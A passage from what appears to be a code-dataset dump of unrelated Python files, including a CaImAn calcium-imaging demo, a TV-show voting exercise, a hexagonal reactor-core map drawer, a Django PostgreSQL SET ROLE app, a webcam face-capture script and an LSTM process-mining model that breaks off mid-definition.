+ '_MMStack_Default.ome.tif'\n# # fileToProcess = os.path.join(CaimanFileDirectory, 'example_movies', getFileName, fullFileName) # join downstream folders\n\n# print(\"File name received: \" + fullFileName)\n# timer.toc()\n# %% ********* Defining parameters: *********\nprint(\"*** Defining analysis parameters ***\")\nfileToProcess = os.path.join(CaimanFileDirectory, 'demoCalciumRecording', 'demoCalciumRecording_MMStack_Default.ome.tif') # FOR TESTING PURPOSES\n\n\nfr = 40 # frame rate (Hz)\ndecay_time = .45 # approximate length of transient event in seconds (for GCaMP6s)\ngSig = (26, 26) # gaussian width of a 2D gaussian kernel, which approximates a neuron\ngSiz = (120, 120) # average diameter of a neuron, in general 4*gSig+1\np = 1 # order of AR indicator dynamics \nmin_SNR = 0.2 # minimum SNR for accepting candidate components\nthresh_CNN_noisy = 0.65 # CNN threshold for candidate components\ngnb = 1 # number of background 
components\ninitMethod_online = 'bare' # initialization method ('cnmf' will save init_file.hdf5, 'bare' will not.. not sure why)\ndeconv_method = 'oasis'\n\n# set up CNMF initialization parameters\ninitFrames = 300 # number of frames for initialization\n# patch_size = 400 # size of patch\n# stride = 30 # amount of overlap between patches\nK = 1 # max number of components in each patch\nnew_K = 0\ncnnFlag = True\n\ninitialParamsDict = {'fr': fr,\n 'fnames': fileToProcess, # file used for initialization\n 'decay_time': decay_time,\n 'gSig': gSig,\n 'gSiz': gSiz,\n 'p': p,\n 'center_psf': False, # set true for 1p data processing\n 'simultaneously': True, # whether to demix and deconvolve simultaneously\n 'normalize': True, # whether to normalize each frame prior to online processing\n 'min_SNR': min_SNR,\n 'nb': gnb,\n 'init_batch': initFrames,\n 'init_method': initMethod_online,\n 'rf': None, # half-size of patch in pixels. If None, no patches are constructed and the whole FOV is processed jointly\n #'stride': stride,\n 'update_num_comps': False,\n 'motion_correct': False,\n 'sniper_mode': True, # whether to use the online CNN classifier for screening candidate components (otherwise space correlation is used)\n 'thresh_CNN_noisy': thresh_CNN_noisy,\n 'K': K,\n 'expected_comps': K,\n 'update_num_comps': False, # whether to search for new components\n 'min_num_trial': new_K,\n 'method_deconvolution': deconv_method,\n 'show_movie': True\n }\n\n\nallParams = params.CNMFParams(params_dict=initialParamsDict) # define parameters in the params.CNMFParams\ncaimanResults = cnmf.online_cnmf.OnACID(params=allParams) # pass parameters to caiman object\n\n\ntimer.toc()\n# %% ********* Wait for initialization trigger message from MicroManager: *********\nprint(\"Now waiting for MicroManager to capture \" + str(initFrames) + \" initialization frames..\")\n\nprint(\"*** Starting Initialization protocol with \" + initMethod_online + \" method ***\")\ncaimanResults.initialize_online() # initialize model\n \n \ntimer.toc()\n# %% ********* Visualize results of initialization: *********\nprint(\"Initialization finished. Choose threshold parameter to adjust accepted/rejected components!\")\nlogging.info('Number of components:' + str(caimanResults.estimates.A.shape[-1]))\nvisual = cm.load(fileToProcess, subindices=slice(0,500)).local_correlations(swap_dim=False)\n# caimanResults.estimates.plot_contours(img=visual)\n\n# ********* Use CNN clasifier to modify accepted/rejected components: *********\ncnnThresh = 0.00001 # change threshold for CNN classifier to modify accepted/rejected components\n\n# if true, pass through the CNN classifier with a low threshold (keeps clearer neuron shapes and excludes processes):\nif cnnFlag: \n allParams.set('quality', {'min_cnn_thr': cnnThresh})\n caimanResults.estimates.plot_contours(img=visual, idx=caimanResults.estimates.idx_components)\n caimanResults.estimates.evaluate_components_CNN(allParams)\n caimanResults.estimates.plot_contours(img=visual, idx=caimanResults.estimates.idx_components)\n \n\n# %% ********* Send message to MicroManager to trigger data streaming: ********* \n\n# input(\"Press Enter after the parameter is chosen...\") # pause for user to decide on parameters\n\n# triggerStream = \"startStreamAcquisition\\n\" # include new line at the end\n# pipeWrite = open(sendPipeName, 'w', 1) # write (1 is for activating line buffering)\n# pipeWrite.write(triggerStream) # write to pipe\n\nprint(\"CaImAn is ready for online analysis. 
Message was sent to MicroManager!\")\n\ntimer.toc()\n\n# %% monkeypatch fit_next() so we can acces deltaf/f0 values during online analysis\ndef monkeypatch(func):\n def wrapped(*args, **kwargs):\n result = func(*args, **kwargs)\n process_frame(args[0], args[1])\n return result\n return wrapped\n\ncnmf.online_cnmf.OnACID.fit_next = monkeypatch(cnmf.online_cnmf.OnACID.fit_next) # replace the class function\n\ndef process_frame(results, t):\n print(t, results.estimates.C_on[0, t])\n deltaf = results.estimates.C_on[0][-1] # last value in estimates.C_on should be deltaf/f0 for last processed frame\n print(deltaf) # this should be pushed to StdpC (instead of print), but values are not correct \n \n# %% ********* Wait for streaming analysis trigger message from MicroManager: ********* \nprint(\"Waiting for MicroManager to start recording..\")\n\n\n# ********* Start online analysis if the message is right: *********\nif K==1: #triggerMessage_analyse == expectedMessage_analyse:\n print(\"*** Starting online analysis with OnACID algorithm ***\")\n caimanResults.fit_online() # online analysis\nelse:\n print(\"*** WARNING *** ONLINE ANALYSIS FAILED ***\")\n #print(\"Wrong cue message. Received: \" + triggerMessage_analyse + \" of type: \" + str(type(triggerMessage_analyse)) +\n # \"Expected: \" + expectedMessage_analyse + \" of type: \" + str(type(expectedMessage_analyse)))\n while True:\n sys.exit()\n\n \n# %% \ncaimanResults.estimates.view_components(img=visual, idx=caimanResults.estimates.idx_components)\n \n# %% TO DO:\n # get output from fit_online()\n # pass the values to stdpc\n\n# os.remove(sendPipeName)\n# os.remove(receivePipeName)\n\n\n\n\n\n","sub_path":"demos/AnalysisDemo.py","file_name":"AnalysisDemo.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248116304","text":"#File: tv_shows.py\n#Author: Austin Bailey\n#Date: 3/22/2016\n#Section: 10\n#E-mail: baustin1@umbc.edu\n#Description: Program will help people decide what tv to watch.\ndef voteSystem(listOfShows):\n print(\"You and your friends are voting on a show to watch.\")\n print(\"Which show would you like to vote for?\")\n check = 1\n voteList = [0] * len(listOfShows)\n while (check != 0):\n vote = int(input(\"Enter '0' to stop voting: \"))\n if ((vote <= 7) or (vote >= 0)):\n if (vote == 0):\n check -= 1\n else:\n voteList[vote - 1] += 1\n else:\n check = 1\n return voteList\ndef main():\n shows = [\"Daredevil\", \"Fargo\", \"Limitless\", \"Elementary\", \"Brooklyn 99\", \"Empire\", \"Supergirl\"]\n lengthOfList = len(shows)\n count = 1\n for g in range(0, lengthOfList):\n print(count, \"-\", shows[g])\n count += 1\n amountOfVotes = voteSystem(shows)\n print(\"Here are the final votes: \")\n for h in range(0, lengthOfList):\n print(shows[h], \"has\", amountOfVotes[h], \"votes.\")\nmain()\n \n","sub_path":"Labs/lab6/tv_shows.py","file_name":"tv_shows.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"147901307","text":"# -*- coding: utf-8 -*-\r\n#\r\n# draws a 360 deg. 
map read from file\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n#\r\nmm = 3.7795 #1mm~3.7795 pxl\r\n# fonts setup\r\nisocp = 'isocpeui.ttf'\r\nfont = ImageFont.truetype(isocp,26)\r\nfont_legend = ImageFont.truetype(isocp,41)\r\nfont_lesser = ImageFont.truetype(isocp,45)\r\nfont_large = ImageFont.truetype(isocp,40)\r\n# image dimensions\r\nfield_x = 770*mm\r\nfield_y = 700*mm\r\nside = 30*mm # hexagon side length\r\nbottom_left = (270*mm, 630*mm) # coordinates of the top point of the bottom left cell\r\nimage = Image.new(\"RGB\", (int(field_x),int(field_y)), (255,255,255,255))\r\ndraw = ImageDraw.Draw(image)\r\n#\r\n###########################################################\r\n# \r\n###########################################################\r\n# legend\r\nleg_str1 = \"БИПР\"\r\nleg_str2 = \"Voyage\"\r\nleg_str3 = \"DYN3D\"\r\nleg_str4 = \"Арена\"\r\n# output filename\r\noutput_fn = \"output.png\"\r\n# input filenames\r\ninput_fn1 = \"1.txt\"\r\ninput_fn2 = \"2.txt\"\r\ninput_fn3 = \"3.txt\"\r\ninput_fn4 = \"4.txt\"\r\ninput_fn5 = '5.txt'\r\nyears = 'years.txt'\r\n##########################################################\r\n# \r\n##########################################################\r\nrows_south = [10,11,12,13,14] #cells in row (bottom half)\r\nrows_north = [13,12,11,10,9] #cells in row (top half)\r\n#\r\n# calculation of a single cell points coordinates from side and top point\r\ndef single_hex(start,side):\r\n coordinates = []\r\n coordinates.append(start) # starts from the top point and goes clockwise\r\n coordinates.append(tuple([start[0]+(((side**2)-(0.5*side)**2)**0.5), start[1]+0.5*side]))\r\n coordinates.append(tuple([start[0]+(((side**2)-(0.5*side)**2)**0.5), start[1]+1.5*side]))\r\n coordinates.append(tuple([start[0], start[1]+2*side]))\r\n coordinates.append(tuple([start[0]-(((side**2)-(0.5*side)**2)**0.5), start[1]+1.5*side]))\r\n coordinates.append(tuple([start[0]-(((side**2)-(0.5*side)**2)**0.5), start[1]+0.5*side]))\r\n return coordinates\r\n#\r\n# calculation of top points for 163 cells\r\ndef startpoints(bottom_left, side):\r\n half_width = ((side**2)-(0.5*side)**2)**0.5\r\n starts = []\r\n starts.append(bottom_left)\r\n for i in range(5):\r\n starts.append(tuple([bottom_left[0]+2*(i+1)*half_width, bottom_left[1]]))\r\n starts.append(tuple([bottom_left[0]-3*half_width, bottom_left[1]-1.5*side]))\r\n localstart = tuple([bottom_left[0]-3*half_width, bottom_left[1]-1.5*side])\r\n for i in range(8):\r\n starts.append(tuple([(bottom_left[0]-3*half_width)+2*(i+1)*half_width, bottom_left[1]-1.5*side]))\r\n for i in rows_south:\r\n localstart = tuple([localstart[0]-half_width, localstart[1]-1.5*side])\r\n starts.append(localstart)\r\n for j in range(i-1):\r\n starts.append(tuple([localstart[0]+2*(j+1)*half_width, localstart[1]]))\r\n starts.append(tuple([bottom_left[0]-7*half_width, bottom_left[1]-10.5*side]))\r\n for i in range(12):\r\n starts.append(tuple([bottom_left[0]-7*half_width+2*(i+1)*half_width, bottom_left[1]-10.5*side]))\r\n starts.append(tuple([bottom_left[0]-8*half_width, bottom_left[1]-12*side]))\r\n for i in range(13):\r\n starts.append(tuple([bottom_left[0]-8*half_width+2*(i+1)*half_width, bottom_left[1]-12*side]))\r\n localstart = tuple([bottom_left[0]-8*half_width, bottom_left[1]-12*side])\r\n for i in rows_north:\r\n localstart = tuple([localstart[0]+half_width, localstart[1]-1.5*side])\r\n starts.append(localstart)\r\n for j in range(i-1):\r\n starts.append(tuple([localstart[0]+2*(j+1)*half_width, localstart[1]]))\r\n 
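    # top row: six more cells, offset 21 hexagon sides above the bottom row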
starts.append(tuple([bottom_left[0], bottom_left[1]-21*side]))\r\n for i in range(5):\r\n starts.append(tuple([bottom_left[0]+2*(i+1)*half_width, bottom_left[1]-21*side]))\r\n return starts\r\ndef startpoints_leg(bottom_left, side):\r\n half_width = ((side**2)-(0.5*side)**2)**0.5\r\n starts = []\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width]))\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width+2.0*side]))\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width+2*2.0*side]))\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width+3*2.0*side]))\r\n return starts\r\n# assemble a list of all required coordinates for 163 cells\r\ndef hex_coordinates(starts):\r\n res = []\r\n for startpoint in starts:\r\n res.append(single_hex(startpoint, side))\r\n return res\r\n#\r\n# 10th cr bank marks\r\ndef cr_starts(starts):\r\n crstrt = []\r\n for i in [30,51,57,105,111,132]:\r\n crstrt.append(tuple([starts[i][0],starts[i][1]+2*mm]))\r\n return crstrt\r\n#\r\ndef cr_bank(starts):\r\n res = []\r\n for startpoint in starts:\r\n res.append(single_hex(startpoint, side-2*mm))\r\n return res\r\n#\r\n# calculation of text box coordinates for enumeration\r\ndef enumeration_startpoints(starts):\r\n x_indent = 6*mm\r\n y_indent = 4*mm\r\n enum_starts = []\r\n for startpoint in starts:\r\n enum_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n return enum_starts\r\n\r\n\r\n#\r\n# four left entries in a cell\r\ndef left_entries(starts):\r\n x_indent = 22*mm\r\n y_indent = 29*mm\r\n step = 10*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n#\r\n# four right entries in a cell\r\ndef right_entries(starts):\r\n x_indent = 4*mm\r\n y_indent = 29*mm\r\n step = 10*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n# four right entries in a cell\r\ndef center_entries(starts):\r\n x_indent = 12*mm\r\n y_indent = 15*mm\r\n step = 9*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.2*y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+1.2*y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.3*y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n\r\ndef center2_entries(starts):\r\n x_indent = 12*mm\r\n y_indent 
= 15*mm\r\n step = 13*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.2*y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+1.2*y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.3*y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n#\r\nshaded = [0,1,2,3,4,5,7,8,9,10,11,12,17,18,19,20,21,28,29,30,31,40,41,42,53,54,67,\r\n 81,82,83,84,85,86,87,96,97,98,99,100,101,110,111,112,113,114,123,124,125,126,135,136,137,146,147,156,\r\n 88,89,90,91,92,93,94,102,103,104,105,106,107,115,116,117,118,119,127,128,129,130,138,139,140,148,149]\r\n#\r\n\r\n# draw hexagonal cells\r\ndef cells_cr(coords):\r\n for coord_list in coords:\r\n draw.polygon(coord_list, outline='black')\r\ndef cells(coords, dev):\r\n years_cell=[]\r\n\r\n\r\n with open (years) as year:\r\n for line in year:\r\n years_cell.append(int(line))\r\n \r\n #red=hex(255)\r\n #green=hex(255/10)\r\n #print (red[2:])\r\n for i in range(len(dev)):\r\n red=int('{:3.0f}'.format(85*dev[i]))\r\n green=int('{:3.0f}'.format(-102*dev[i]+561))\r\n\r\n print (red, green, red+green)\r\n if int(red)>255:\r\n red=255\r\n elif red<0:\r\n red=0\r\n if int(green)<0:\r\n green=0\r\n elif int(green)>255:\r\n green=255\r\n r=hex(red)[2:]\r\n g=hex(green)[2:]\r\n\r\n if len(r)<2:\r\n r='0'+r\r\n if len(g)<2:\r\n g='0'+g\r\n draw.polygon(coords[i], outline='black', fill='#'+r+g+'00') \r\n #if dev[i]>5:\r\n # draw.polygon(coords[i], outline='black', fill='#'+r+g'00')\r\n #if dev[i]>2 and dev[i]<=5:\r\n # draw.polygon(coords[i], outline='black', fill='#ff9999')\r\n #if dev[i]>1 and dev[i]<=2:\r\n # draw.polygon(coords[i], outline='black', fill='#ffff66')\r\n #if dev[i]<=1 :\r\n # draw.polygon(coords[i], outline='black', fill='#66ff66')\r\n #else:\r\n # draw.polygon(coords[i], outline='black')\r\ndef cells_leg(coords):\r\n for i in range(len(coords)):\r\n if i==1:\r\n draw.polygon(coords[i], outline='black', fill='#f3f3f3')\r\n if i==2:\r\n draw.polygon(coords[i], outline='black', fill='#d8d8d8')\r\n if i==3:\r\n draw.polygon(coords[i], outline='black', fill='#b9b9b9')\r\n else:\r\n draw.polygon(coords[i], outline='black')\r\n#\r\n# enumerate cells\r\ndef numbers(starts):\r\n nums = range(1,164)\r\n i = -1\r\n for startpoint in starts:\r\n i += 1\r\n if len(str(nums[i]))==1:\r\n draw.text(startpoint,' '+str(nums[i]), font = font, fill = 'black')\r\n elif len(str(nums[i]))==2:\r\n draw.text(startpoint,' '+str(nums[i]), font = font, fill = 'black')\r\n\r\n else:\r\n draw.text(startpoint,str(nums[i]), font = font, fill = 'black')\r\n#\r\n# read data\r\ndef readdata(fname):\r\n res, res1 = [],[]\r\n with open(fname, 'r') as inp:\r\n for line in inp:\r\n res.append(line.split())\r\n #res.reverse()\r\n for i in range(len(res)):\r\n if len(res[i])!=0:\r\n for j in range(len(res[i])):\r\n try:\r\n res1.append('{:.4f}'.format(float(res[i][j])))\r\n except:\r\n res1.append(res[i][j])\r\n return res1\r\n#\r\n# plot data from dataset\r\ndef plotdata(dataset,coords):\r\n i = 0\r\n for startpoint in coords:\r\n draw.text(startpoint, dataset[i], font = font_large, fill = 'black')\r\n i+=1\r\n#\r\n# dataset files, enumerated from top left entry\r\nvac={160: \"439MT\", 148: \"398MO\", 124:\"353MO\"}\r\ndataset1 = readdata(input_fn1)\r\ndataset1 = 
[vac[int(float(i))] for i in dataset1]\r\ndataset2 = ['{: ^6.3f}'.format(float(x)) for x in readdata(input_fn2)]\r\ndataset3 = ['{: ^6.3f}'.format(float(x)) for x in readdata(input_fn3)]\r\n\r\ndataset4 = ['{: ^6.2f}'.format((float(readdata(input_fn3)[i])-float(readdata(input_fn2)[i]))/float(readdata(input_fn2)[i])*100.0) for i in range(0,len(dataset2))]\r\n\r\n#dataset5 = readdata('kq1.txt')\r\n#dataset6 = readdata('kq1.txt')\r\n#dataset7 = readdata('kq1.txt')\r\n#dataset8 = readdata('kq1.txt')\r\n\r\n#\r\n# draw a legend\r\ndef legend():\r\n half_width = ((side**2)-(0.5*side)**2)**0.5\r\n lside = 1.5*side\r\n lstart = tuple([(bottom_left[0]-7*half_width)-100, (bottom_left[1]-22*side)+200])\r\n x_num = 10\r\n y_num = 20\r\n x_dat = 100\r\n y_dat = 150\r\n x_datr = 0\r\n dstep = 70\r\n draw.polygon(single_hex(lstart,lside), outline='black')\r\n draw.text(tuple([lstart[0]-x_num, lstart[1]+y_num]), '№', font = font, fill = 'black')\r\n centry0 = tuple([lstart[0]-40, lstart[1]+40])\r\n centry1 = tuple([lstart[0]-80, lstart[1]+80])\r\n centry2 = tuple([lstart[0]-115, lstart[1]+230])\r\n centry3 = tuple([lstart[0]-40, lstart[1]+250])\r\n lentry1 = tuple([lstart[0]-130, lstart[1]+170])\r\n lentry2 = tuple([lstart[0]-100, lstart[1]+130])\r\n rentry1 = tuple([lstart[0]+15, lstart[1]+170])\r\n rentry2 = tuple([lstart[0]+40, lstart[1]+130])\r\n #\r\n draw.text(lentry1,\"набор1\", font=font_legend, fill='black')\r\n draw.text(rentry1,\"набор2\", font=font_legend, fill='black')\r\n draw.text(lentry2,\"kq\", font=font_legend, fill='black')\r\n draw.text(rentry2,\"kq\", font=font_legend, fill='black')\r\n draw.text(centry0,\"Кассеты\", font=ImageFont.truetype(isocp,25), fill='black')\r\n draw.text(centry2,\"Отклонение,%\", font=font_legend, fill='black')\r\n draw.text(centry1,\"тип ТВС\", font=font_legend, fill='black')\r\n\r\n#\r\n#\r\ncells(hex_coordinates(startpoints(bottom_left, side)), [abs(float(x)) for x in dataset4])\r\ncells_cr(cr_bank(cr_starts(startpoints(bottom_left, side))))\r\nnumbers(enumeration_startpoints(startpoints(bottom_left, side)))\r\nplotdata(dataset1,center_entries(startpoints(bottom_left, side))[0])\r\nplotdata(dataset2,left_entries(startpoints(bottom_left, side))[0])\r\nplotdata(dataset3,right_entries(startpoints(bottom_left, side))[0])\r\nplotdata(dataset4,center2_entries(startpoints(bottom_left, side))[2])\r\n\r\n\r\nlegend()\r\n#cells_leg(hex_coordinates(startpoints_leg(bottom_left, side)))\r\n#plotdata([' ТВС' for x in range(len(startpoints_leg(bottom_left, side)))],center_entries(startpoints_leg(bottom_left, side))[0])\r\n#plotdata([' 1',' 2',' 3',' 4'],center_entries(startpoints_leg(bottom_left, side))[1])\r\n#plotdata([' год' for x in range(len(startpoints_leg(bottom_left, side)))],center_entries(startpoints_leg(bottom_left, side))[2])\r\n\r\n#\r\ndel draw\r\nimage.save(output_fn, 'png')\r\n\r\n \r\n \r\n","sub_path":"картограммы/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":14116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"613436148","text":"# -* encoding: utf-8 *-\nimport warnings\n\nfrom django.apps import AppConfig\nfrom django.db.backends.postgresql.base import DatabaseWrapper as PostgreSQLDatabaseWrapper\nfrom django.db.backends.signals import connection_created\nfrom typing import Any, Type\n\n\nwarning_given = False\n\n\ndef setrole_connection(*, connection: PostgreSQLDatabaseWrapper, **kwargs: Any) -> None:\n if not isinstance(connection, PostgreSQLDatabaseWrapper):\n return\n 
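    # the role may be configured under either key casing in the DATABASES settings dict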
global warning_given\n role = None\n if \"set_role\" in connection.settings_dict:\n role = connection.settings_dict[\"set_role\"]\n elif \"SET_ROLE\" in connection.settings_dict:\n role = connection.settings_dict[\"SET_ROLE\"]\n\n if role:\n connection.cursor().execute(\"SET ROLE %s\", (role,))\n\n\nclass DjangoPostgreSQLSetRoleApp(AppConfig):\n name = \"postgresql_setrole\"\n\n def ready(self) -> None:\n connection_created.connect(setrole_connection)\n\n\ndefault_app_config = 'postgresql_setrole.DjangoPostgreSQLSetRoleApp'\n","sub_path":"postgresql_setrole/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"272446614","text":"import cv2\nimport sys\nimport time;\nfrom GetData.code.align import *\ndef createFolder(label):\n import os\n path = \"image/\"+label\n try: \n os.makedirs(path)\n except OSError: \n print (\"Creation of the directory %s failed\" % path)\n else: \n print (\"Successfully created the directory %s\" % path)\ndef getData(label):\n createFolder(label)\n cascPath = \"GetData/code/haarcascade_frontalface_default.xml\"\n\n faceCascade = cv2.CascadeClassifier(cascPath)\n video_capture = cv2.VideoCapture(0)\n ftime=time.time()\n begin = time.time()\n\n while (time.time()-begin<=30):\n # Capture frame-by-frame\n \n ret, frame = video_capture.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE, \n )\n\n # Draw a rectangle around the faces \n for (x, y, w, h) in faces:\n if (time.time() - ftime >= 0.5):\n ftime=time.time()\n imageName = str(\"image/\"+label+\"/\"+time.strftime(\"%Y_%m_%d_%H_%M_%S\") + '.jpg')\n cv2.imwrite(imageName, frame)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n \n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n video_capture.release()\n cv2.destroyAllWindows()\n align_Image(label)\n# When everything is done, release the capture\n","sub_path":"GetData/code/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582175395","text":"# -*- coding:utf-8 -*-\n\n# coding:utf8\nimport datetime\nimport time\n\n\ndef doSth():\n\n print(u'这个程序要开始疯狂的运转啦')\n\n\ndef main(h=14, m=42):\n while True:\n now = datetime.datetime.now()\n # print(now.hour, now.minute)\n if now.hour == h and now.minute == m:\n doSth()\n # 每隔60秒检测一次\n time.sleep(60)\n\n\nmain()","sub_path":"test_agent/test_tongbu/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"526526196","text":"\"\"\"\nContext processors for the Home app, which include login / registration via Userena.\n\nThese return dictionaries to be merged into a\ntemplate context. 
Each function takes the request object as its only parameter\nand returns a dictionary to add to the context.\n\nThese are referenced from the setting TEMPLATE_CONTEXT_PROCESSORS and used by\nRequestContext.\n\"\"\"\n\n#from django.conf import settings as django_settings\n#from django.db.models import get_models, Manager\n#from django.utils.safestring import mark_safe\n\nfrom userena.forms import SignupForm, AuthenticationForm\n\n\n#### module globals\n\ntrace = 0\n\n\n#### Context Processors\n\ndef registration_forms (request):\n return {\n 'signup_form': SignupForm,\n 'signin_form': AuthenticationForm,\n }\n\n\ndef cart_variables (request):\n from helpers import SessionHelper\n\n seshelp = SessionHelper (request.session)\n totqty, grandtot = seshelp.cart_totals()\n\n return {\n 'cart_totqty': totqty,\n 'cart_grandtot': grandtot,\n }\n\n\ndef environment (request):\n import os\n return os.environ\n","sub_path":"apps/home/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"65577406","text":"# Subject: Case Remaining Time Prediction\n# Method: LSTM (seq_len = 1, batch_size = size of events in training set, input_size = 27)\n# Feature set:\n# (1) activity_type (ont-hot encoded)\n# (2) sequence of event, debugged\n# (3) time from trace start\n# (4) weighted execution time\n\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler, RobustScaler, OneHotEncoder\nfrom sklearn.compose import make_column_transformer\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom matplotlib import pyplot as plt\n\n\"\"\"\n1. Preprocess\n\"\"\"\n\n# read data\ndf = pd.read_csv(\"./data/bpic2012_refined.csv\")\n\n# calculate trace number and lengths\nnum_of_traces = len(np.unique(df['case_id']))\ntraces_lens = df.groupby('case_id').count().seq_of_event\ntraces_lens = np.array(traces_lens)\n\n# calculate a number of activity types\nnum_of_acts = len(np.unique(df['activity_type']))\n\n# find a parting trace which is the last trace for the train/valid separation\nparting_trace_idx = int(num_of_traces * 0.8)\nparting_trace_id = np.unique(df['case_id'])[parting_trace_idx]\n\n# find a parting event's index which is the last event's index of the parting trace.\n# used as a separation line between train/valid sets\nparting_event_idx = df.loc[df['case_id'] == parting_trace_id]\\\n .index.values.astype(int)[-1]\n\n# set up the transformer (one hot encoder, feature scaler)\npreprocess = make_column_transformer(\n (OneHotEncoder(), ['activity_type']),\n (RobustScaler(), ['seq_of_event', 'time_from_trace_start', 'weighted_execution_time']),\n ('passthrough', ['case_remaining_time'])\n)\n\n# transform data and separate it into train/valid sets\ntrain = preprocess.fit_transform(df[:parting_event_idx+1]).toarray()\nvalid = preprocess.transform(df[parting_event_idx+1:]).toarray()\n\n# calculate the size of input vector\ninput_size = train.shape[1]-1 # excludes the attribute of target values\n\n# transformation (ndarray -> torch)\ndef transform_data(input_data: np.ndarray) -> (np.ndarray, np.ndarray):\n x_lst, y_lst = [], []\n size = len(input_data)\n for i in range(size - seq_len + 1):\n # input sequence\n seq = input_data[i:i+seq_len, :input_size]\n # target values of current time steps\n target = input_data[i+seq_len-1, -1]\n x_lst.append(seq)\n y_lst.append(target)\n x_arr = np.array(x_lst)\n y_arr = np.array(y_lst)\n 
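    # x_arr has shape (num_windows, seq_len, input_size); y_arr has shape (num_windows,)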
print(\"[INFO]x_arr.shape = \" + str(x_arr.shape))\n print(\"[INFO]y_arr.shape = \" + str(y_arr.shape))\n return x_arr, y_arr\n\n\n# select device between gpu and cpu\ndtype = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.float\n\nseq_len = 10\nbatch_size = 100\n\nx_train, y_train = transform_data(train)\nx_valid, y_valid = transform_data(valid)\n\n# calculate a number of batches\nnum_batches = int(x_train.shape[0] / batch_size)\n\nif x_train.shape[0] % batch_size != 0:\n num_batches += 1\n\n\n\"\"\"\n2. Model Definition\n\"\"\"\n\n# hyperparameters setup\nhidden_size = 150 # default: 32\noutput_dim = 1\nnum_layers = 3 # default: 2\nlearning_rate = 1e-3 # default: 1e-3\nnum_epochs = 200 # default: 200\n\n# the LSTM model\nclass LSTM(nn.Module):\n def __init__(self, input_dim, hidden_dim, batch_size, output_dim=1, num_layers=2):\n super(LSTM, self).__init__()\n self.input_dim = input_dim\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.seq_len = 0\n self.num_layers = num_layers\n # define the LSTM layer\n self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers)\n # define the output layer\n self.linear = nn.Linear(self.hidden_dim, output_dim)\n def init_hidden(self):\n # initialize hidden states\n return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).type(dtype),\n torch.zeros(self.num_layers, self.batch_size, 